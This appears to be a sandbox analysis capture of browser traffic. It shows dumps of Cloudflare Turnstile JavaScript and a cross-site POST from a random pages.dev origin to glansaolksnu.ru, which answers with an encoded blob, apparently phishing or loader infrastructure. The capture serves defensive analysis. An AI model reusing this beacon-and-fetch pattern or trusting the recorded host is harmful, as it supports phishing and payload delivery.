                                                                Data Ascii: e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function $e(e,r){return r=r!=nu
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                                Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                                Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                                Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                                Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                                Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                                2024-08-27 18:03:38 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                                Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.1649742104.21.51.1384433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:38 UTC699OUTPOST // HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                Content-Length: 24
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-platform: "Windows"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Content-Type: text/plain;charset=UTF-8
                                                                Accept: */*
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:38 UTC24OUTData Raw: 7b 22 69 63 6f 6e 6f 63 6c 61 73 74 22 3a 22 67 61 69 6e 66 75 6c 22 7d
                                                                Data Ascii: {"iconoclast":"gainful"}
                                                                2024-08-27 18:03:41 UTC649INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:41 GMT
                                                                Content-Type: application/json
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGxl2RmDs4u%2F6IFG5ElidmuUc6%2BjNH3sPSHxRKm2Ido39TSlFtwVAdGZ7iWmMo2JE2tV%2B29tI1LlhGRIrt7OuxsuZVH%2FjrsjZ4nwAYFbpxT8lK1ZoZeQIZja9WJmoMEzyF0%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfac02f8a7cb1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:41 UTC720INData Raw: 34 39 33 32 0d 0a 7b 22 61 22 3a 22 75 63 78 56 79 7a 47 64 4d 4a 4e 31 77 7a 74 66 71 38 44 56 48 4f 39 62 44 6b 51 6e 37 74 51 55 31 53 34 6b 5a 41 75 78 59 34 77 66 35 4c 62 53 56 31 47 4c 47 58 36 43 4b 74 75 38 41 57 64 42 44 42 4b 65 2b 41 4e 77 4c 73 71 59 5a 4c 71 4b 67 39 62 77 7a 69 6a 45 78 4d 54 4b 63 36 38 70 69 6d 43 6a 4a 6b 6b 39 57 72 63 52 33 37 37 4e 5a 6d 44 68 62 64 30 2b 72 32 30 73 77 4c 33 45 62 49 45 73 42 66 78 37 4c 56 65 4a 33 35 6d 6f 5a 62 4a 61 77 62 32 61 6f 48 69 7a 5a 44 5a 6b 54 36 6f 6d 6c 37 65 56 48 6b 4e 31 39 46 48 78 74 56 65 72 71 32 6f 69 59 58 65 78 69 71 50 50 63 42 6f 63 43 63 36 7a 34 5a 43 76 6b 72 48 4d 53 48 55 63 4a 46 50 30 62 61 65 59 47 78 48 71 76 6d 46 79 64 48 39 5a 65 75 63 45 35 36 66 64 4e 48 2b
                                                                Data Ascii: 4932{"a":"ucxVyzGdMJN1wztfq8DVHO9bDkQn7tQU1S4kZAuxY4wf5LbSV1GLGX6CKtu8AWdBDBKe+ANwLsqYZLqKg9bwzijExMTKc68pimCjJkk9WrcR377NZmDhbd0+r20swL3EbIEsBfx7LVeJ35moZbJawb2aoHizZDZkT6oml7eVHkN19FHxtVerq2oiYXexiqPPcBocCc6z4ZCvkrHMSHUcJFP0baeYGxHqvmFydH9ZeucE56fdNH+
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 36 69 6a 30 63 48 73 4d 49 66 43 54 51 36 74 71 62 76 48 46 64 45 71 4f 32 61 4e 45 34 66 35 70 2b 46 5a 66 50 4d 68 7a 54 34 36 44 72 6b 6d 4e 6d 43 4d 34 4c 41 51 31 36 36 72 6c 59 6a 30 54 5a 63 64 34 48 4f 49 61 4e 63 62 5c 2f 65 61 6c 7a 5a 42 51 6f 58 52 42 35 49 30 78 2b 75 49 4f 41 4e 31 32 52 45 68 54 79 78 6d 68 39 4b 53 31 53 61 77 6a 6b 38 79 6b 55 65 58 56 32 74 68 47 5c 2f 79 56 4d 7a 56 73 34 50 42 71 62 43 6e 78 47 31 6c 35 43 36 5c 2f 45 72 7a 62 6f 74 63 44 31 48 34 4f 38 38 7a 34 6b 76 78 79 6b 31 71 7a 34 57 4a 34 6a 5a 4e 38 44 43 49 4b 73 61 61 61 30 68 55 66 30 67 79 58 56 30 52 66 2b 66 31 74 32 59 59 70 52 71 6a 52 6b 6d 30 2b 4a 6a 6f 51 61 52 33 34 41 41 53 48 46 78 76 66 48 78 4e 68 44 6b 34 64 6a 75 6a 4d 7a 6e 75 76 77 74 50
                                                                Data Ascii: 6ij0cHsMIfCTQ6tqbvHFdEqO2aNE4f5p+FZfPMhzT46DrkmNmCM4LAQ166rlYj0TZcd4HOIaNcb\/ealzZBQoXRB5I0x+uIOAN12REhTyxmh9KS1Sawjk8ykUeXV2thG\/yVMzVs4PBqbCnxG1l5C6\/ErzbotcD1H4O88z4kvxyk1qz4WJ4jZN8DCIKsaaa0hUf0gyXV0Rf+f1t2YYpRqjRkm0+JjoQaR34AASHFxvfHxNhDk4djujMznuvwtP
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 50 54 79 2b 61 76 65 58 51 41 4d 49 49 4c 39 35 77 71 4d 6d 44 36 64 32 5a 4f 78 50 7a 78 72 45 63 59 30 4f 55 55 75 46 6f 7a 6b 62 54 6f 78 61 50 43 31 47 7a 56 49 32 6a 6f 35 7a 68 4c 34 6b 51 35 33 42 75 7a 57 47 49 59 5c 2f 61 39 68 47 45 39 5a 49 5a 74 61 32 6f 4f 31 72 49 2b 4a 4d 57 77 4e 2b 67 54 47 63 44 38 51 63 4e 31 30 6d 6f 68 77 61 50 57 6a 46 62 57 49 78 34 44 63 39 51 35 4f 34 45 64 46 45 76 48 5c 2f 61 79 78 7a 49 4d 55 2b 72 62 53 63 32 52 4a 30 54 77 7a 5a 59 51 6c 53 72 38 78 49 32 77 71 34 49 34 73 54 43 62 30 74 53 7a 4f 4f 50 49 71 42 7a 54 34 48 4a 4b 51 78 73 41 38 59 71 38 48 6a 34 50 33 69 41 2b 44 75 67 57 4a 58 6c 78 7a 42 37 50 6c 30 42 30 57 73 55 72 4c 2b 44 66 39 57 48 6e 78 59 6b 7a 76 64 71 78 6e 6b 77 4f 42 77 72 63 76
                                                                Data Ascii: PTy+aveXQAMIIL95wqMmD6d2ZOxPzxrEcY0OUUuFozkbToxaPC1GzVI2jo5zhL4kQ53BuzWGIY\/a9hGE9ZIZta2oO1rI+JMWwN+gTGcD8QcN10mohwaPWjFbWIx4Dc9Q5O4EdFEvH\/ayxzIMU+rbSc2RJ0TwzZYQlSr8xI2wq4I4sTCb0tSzOOPIqBzT4HJKQxsA8Yq8Hj4P3iA+DugWJXlxzB7Pl0B0WsUrL+Df9WHnxYkzvdqxnkwOBwrcv
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 32 7a 79 5a 71 4b 33 38 52 42 74 4e 4f 44 38 5a 6e 71 2b 55 31 6b 6b 6a 41 41 5c 2f 55 57 32 51 43 35 51 78 36 31 77 67 70 38 74 4c 75 45 74 77 32 6f 69 6e 4f 43 79 31 75 58 62 30 51 2b 71 37 67 30 35 54 31 54 69 49 4e 4f 30 77 43 5a 37 42 6f 38 6e 75 31 63 4c 66 30 6f 36 67 49 39 45 2b 43 6e 64 78 5c 2f 6f 32 39 48 74 78 4a 30 6d 30 66 39 76 5c 2f 37 75 34 68 39 4e 30 37 54 2b 6a 51 55 44 31 58 76 71 41 49 79 4c 75 75 42 42 33 51 78 6e 2b 59 52 54 43 55 5a 4a 34 55 55 49 59 67 5c 2f 56 44 64 33 76 62 63 55 62 78 6d 44 72 65 76 74 33 61 46 37 49 74 38 6e 62 30 31 4a 6e 59 4c 6a 44 58 72 74 78 53 73 41 34 5c 2f 58 75 63 6a 66 50 75 39 52 6b 37 68 74 72 54 31 71 49 4e 2b 58 79 4a 56 70 4c 75 6f 42 77 79 57 45 61 4b 41 52 65 48 61 78 52 73 70 31 50 6b 5c 2f
                                                                Data Ascii: 2zyZqK38RBtNOD8Znq+U1kkjAA\/UW2QC5Qx61wgp8tLuEtw2oinOCy1uXb0Q+q7g05T1TiINO0wCZ7Bo8nu1cLf0o6gI9E+Cndx\/o29HtxJ0m0f9v\/7u4h9N07T+jQUD1XvqAIyLuuBB3Qxn+YRTCUZJ4UUIYg\/VDd3vbcUbxmDrevt3aF7It8nb01JnYLjDXrtxSsA4\/XucjfPu9Rk7htrT1qIN+XyJVpLuoBwyWEaKAReHaxRsp1Pk\/
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 44 6e 45 55 66 52 72 57 79 62 78 4b 4a 34 5c 2f 72 7a 37 44 68 39 49 6d 49 55 53 49 4e 6f 31 44 55 74 75 33 43 63 65 6e 53 41 30 47 6d 51 30 42 61 54 77 6e 55 32 58 5a 65 55 57 41 49 54 51 71 38 38 33 37 65 59 72 57 73 76 4d 34 41 75 4c 4a 78 52 38 4c 31 72 75 4f 75 4a 51 50 51 42 55 6c 6b 79 73 6d 55 4f 46 43 58 36 55 72 51 66 75 68 54 77 35 35 68 64 52 76 33 4a 6f 47 6f 69 45 31 61 4a 34 57 39 71 34 65 55 79 45 46 48 67 42 63 4d 6a 34 32 53 47 5c 2f 48 69 38 46 4e 6d 6e 4e 34 41 36 63 35 50 6e 7a 69 77 33 51 55 71 78 54 58 42 36 78 65 61 2b 56 62 6a 45 6c 30 35 37 4f 6e 4b 77 54 49 56 4e 38 36 5c 2f 58 5c 2f 6a 77 78 79 35 49 4b 61 46 58 73 65 71 56 77 31 4d 5c 2f 57 4d 4d 76 46 52 6b 7a 63 5a 48 57 55 42 53 37 6c 78 6e 49 70 41 54 6e 69 66 35 53 54 6b
                                                                Data Ascii: DnEUfRrWybxKJ4\/rz7Dh9ImIUSINo1DUtu3CcenSA0GmQ0BaTwnU2XZeUWAITQq8837eYrWsvM4AuLJxR8L1ruOuJQPQBUlkysmUOFCX6UrQfuhTw55hdRv3JoGoiE1aJ4W9q4eUyEFHgBcMj42SG\/Hi8FNmnN4A6c5Pnziw3QUqxTXB6xea+VbjEl057OnKwTIVN86\/X\/jwxy5IKaFXseqVw1M\/WMMvFRkzcZHWUBS7lxnIpATnif5STk
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 33 48 7a 45 66 6a 4b 77 57 34 71 6e 39 4d 4a 54 7a 6a 43 43 76 71 4b 38 68 38 66 6d 30 71 32 73 74 6d 4d 75 61 34 69 53 41 4f 49 51 4a 65 2b 66 69 51 34 58 48 64 7a 67 6f 79 7a 44 6a 30 6e 70 69 76 61 49 50 34 6f 38 70 6d 73 42 4b 5a 4e 6f 56 38 32 42 4b 6f 56 78 48 36 6e 31 58 4c 77 39 79 6c 49 69 5c 2f 43 58 36 6e 4e 66 38 5a 69 6a 48 45 6f 73 64 72 41 35 76 7a 36 49 78 4c 54 35 47 54 72 78 79 4a 53 49 6b 4b 6d 6e 79 35 59 75 62 69 49 42 54 66 57 43 4b 79 65 2b 42 61 52 76 69 74 6f 51 34 42 51 79 54 55 6c 4c 2b 66 75 62 6b 7a 46 6a 71 32 4b 49 70 76 70 63 61 4f 4a 51 45 72 73 32 49 73 52 66 47 35 62 32 68 31 57 50 52 75 6d 4a 77 61 2b 79 6f 57 67 57 4d 53 52 74 4b 7a 33 64 76 49 51 58 4d 4f 51 6d 37 73 6f 57 67 76 37 65 73 71 4b 55 56 5a 72 37 59 31 6c
                                                                Data Ascii: 3HzEfjKwW4qn9MJTzjCCvqK8h8fm0q2stmMua4iSAOIQJe+fiQ4XHdzgoyzDj0npivaIP4o8pmsBKZNoV82BKoVxH6n1XLw9ylIi\/CX6nNf8ZijHEosdrA5vz6IxLT5GTrxyJSIkKmny5YubiIBTfWCKye+BaRvitoQ4BQyTUlL+fubkzFjq2KIpvpcaOJQErs2IsRfG5b2h1WPRumJwa+yoWgWMSRtKz3dvIQXMOQm7soWgv7esqKUVZr7Y1l
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 59 65 62 35 63 6a 51 49 41 62 4a 43 75 46 57 63 4a 79 33 48 68 47 63 69 74 4e 79 35 31 5c 2f 58 78 34 74 6b 63 34 7a 73 37 34 4e 32 54 6c 39 48 48 66 50 73 6a 36 6c 2b 48 78 71 4f 5c 2f 6c 6b 38 54 64 63 4d 71 62 59 7a 33 73 5c 2f 30 77 56 77 6f 36 2b 6e 62 75 38 55 67 56 62 4f 4d 4b 7a 4a 55 7a 39 6d 71 31 54 61 6b 73 6d 59 46 30 5a 5a 4f 45 32 37 39 6f 4b 72 39 56 72 34 42 57 45 4e 4b 4d 74 70 69 52 56 79 49 70 6c 61 4d 35 39 69 51 78 33 57 34 51 4e 5c 2f 44 71 50 31 50 2b 58 4b 55 70 2b 48 76 68 4a 63 63 6a 42 6d 43 6d 5a 51 31 6b 4e 30 4d 33 32 42 70 37 35 70 63 6d 32 73 41 64 64 68 50 66 31 74 6a 6e 41 62 39 67 49 46 36 6b 77 6d 79 41 5a 65 52 77 45 51 4d 69 37 58 37 43 6d 73 47 43 66 66 63 2b 35 55 54 6b 79 55 6c 54 46 61 32 66 47 67 43 79 69 62 74
                                                                Data Ascii: Yeb5cjQIAbJCuFWcJy3HhGcitNy51\/Xx4tkc4zs74N2Tl9HHfPsj6l+HxqO\/lk8TdcMqbYz3s\/0wVwo6+nbu8UgVbOMKzJUz9mq1TaksmYF0ZZOE279oKr9Vr4BWENKMtpiRVyIplaM59iQx3W4QN\/DqP1P+XKUp+HvhJccjBmCmZQ1kN0M32Bp75pcm2sAddhPf1tjnAb9gIF6kwmyAZeRwEQMi7X7CmsGCffc+5UTkyUlTFa2fGgCyibt
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 56 61 69 34 33 33 46 69 52 33 6e 6b 39 33 76 59 54 72 37 39 30 7a 35 66 35 69 44 4e 75 79 51 5c 2f 62 6e 69 51 44 59 50 4b 33 7a 4e 64 62 32 59 71 65 41 55 72 32 57 41 54 42 59 56 72 35 79 36 32 34 57 42 64 62 58 6c 62 76 68 62 48 4b 4f 42 63 67 59 6a 4d 37 7a 73 36 68 49 41 55 70 38 76 34 49 76 64 54 34 5a 6f 6d 6b 41 4b 71 31 59 70 6b 41 32 62 68 47 54 52 45 55 4a 30 49 61 35 55 73 4c 73 34 4d 43 79 47 57 38 68 4b 48 4c 57 6b 41 6e 67 4b 79 70 54 77 61 42 5c 2f 6b 4c 4a 69 78 50 47 4e 64 45 37 6f 41 38 6f 57 32 58 46 4b 53 59 59 50 47 42 33 37 50 59 31 6a 6e 57 62 71 65 41 70 64 34 6d 4a 78 79 30 45 51 46 63 71 43 69 75 55 6f 55 42 34 45 61 58 54 52 48 6b 74 30 45 69 64 6f 77 73 68 70 7a 59 36 69 33 4d 78 64 44 6a 30 79 59 32 33 61 42 37 77 74 32 4d 6a
                                                                Data Ascii: Vai433FiR3nk93vYTr790z5f5iDNuyQ\/bniQDYPK3zNdb2YqeAUr2WATBYVr5y624WBdbXlbvhbHKOBcgYjM7zs6hIAUp8v4IvdT4ZomkAKq1YpkA2bhGTREUJ0Ia5UsLs4MCyGW8hKHLWkAngKypTwaB\/kLJixPGNdE7oA8oW2XFKSYYPGB37PY1jnWbqeApd4mJxy0EQFcqCiuUoUB4EaXTRHkt0EidowshpzY6i3MxdDj0yY23aB7wt2Mj
                                                                2024-08-27 18:03:41 UTC1369INData Raw: 62 77 30 34 44 42 68 41 4f 6e 71 69 49 58 66 36 4f 65 33 61 6e 68 66 6f 72 49 72 47 78 6d 69 76 4f 38 51 46 49 56 64 76 63 31 7a 4b 47 53 38 6a 58 76 46 4d 4b 4f 56 46 39 47 5a 62 64 48 61 70 44 51 4d 51 73 39 64 4f 70 76 64 39 75 6a 4b 36 71 31 34 36 31 57 74 71 44 77 79 59 33 55 4e 68 46 77 63 67 6c 51 67 68 56 50 59 5c 2f 69 53 4b 46 77 73 62 72 38 56 56 49 78 45 31 32 57 6e 6c 47 44 4d 5c 2f 46 4c 30 4e 72 66 74 31 70 39 56 6a 59 35 4e 41 45 42 70 68 4d 52 6c 79 37 54 2b 66 45 54 58 53 2b 38 39 52 37 63 4f 35 6e 65 6a 5c 2f 58 30 70 4f 30 34 52 46 35 59 52 33 4d 36 71 62 69 34 78 32 44 59 79 52 6c 44 6d 78 34 77 6f 4a 48 4f 35 30 4b 43 35 41 66 4b 44 38 44 32 62 4d 37 55 68 33 79 50 39 63 4f 38 53 35 2b 67 78 6c 5c 2f 6f 55 77 75 74 35 33 30 32 55 48
